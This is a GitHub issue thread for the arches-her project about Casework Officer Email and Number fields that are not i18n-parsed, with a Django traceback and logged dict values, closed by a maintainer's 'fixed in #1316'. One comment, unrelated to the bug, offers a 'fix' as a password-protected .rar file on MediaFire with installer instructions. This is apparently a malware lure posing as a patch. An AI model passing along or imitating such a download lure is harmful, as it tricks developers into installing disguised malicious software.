### ISSUE TITLE
Casework Officer Email and Number not being i18n parsed and causes letter error

### ISSUE THREAD

**Issue by samuelscandrett** [archesproject/arches-her#1315]
The Casework Officer Email field appears to not be i18n parsed properly, producing the following error
```
Internal Server Error: /filetemplate
Traceback (most recent call last):
  File "/home/samuel/arches_dev/arches_her/env3.11/lib/python3.11/site-packages/django/core/handlers/exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
  File "/home/samuel/arches_dev/arches_her/env3.11/lib/python3.11/site-packages/django/core/handlers/base.py", line 197, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/samuel/arches_dev/arches_her/env3.11/lib/python3.11/site-packages/django/views/generic/base.py", line 104, in view
    return self.dispatch(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/samuel/arches_dev/arches_her/env3.11/lib/python3.11/site-packages/django/views/generic/base.py", line 143, in dispatch
    return handler(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/samuel/arches_dev/arches_her/arches_her/arches_her/views/file_template.py", line 91, in post
    self.edit_letter(self.resource, datatype_factory)
  File "/home/samuel/arches_dev/arches_her/arches_her/arches_her/views/file_template.py", line 203, in edit_letter
    self.replace_in_letter(consultation.tiles, template_dict, datatype_factory)
  File "/home/samuel/arches_dev/arches_her/arches_her/arches_her/views/file_template.py", line 425, in replace_in_letter
    if htmlTags.search(mapping_dict[key] if mapping_dict[key] is not None else ""):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: expected string or bytes-like object, got 'dict'
```

Logging out the `key` and `mapping_dict[key]` shows that it is Casework OFficer Email and the value associated is the full i18n data
```
Casework Officer Email {'de': {'value': '', 'direction': 'ltr'}, 'el': {'value': '', 'direction': 'ltr'}, 'en': {'value': 'samuel@email', 'direction': 'ltr'}, 'fr': {'value': '', 'direction': 'ltr'}, 'pt': {'value': '', 'direction': 'ltr'}, 'ru': {'value': '', 'direction': 'ltr'}, 'zh': {'value': '', 'direction': 'ltr'}, 'en-US': {'value': '', 'direction': 'ltr'}, 'en-us': {'value': '', 'direction': 'ltr'}}
```

The same occurs with Casework Officer Number.

This prevents the workflow from being able to progress, returning to the first page.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by aj-he** [comment]
fixed in #1316
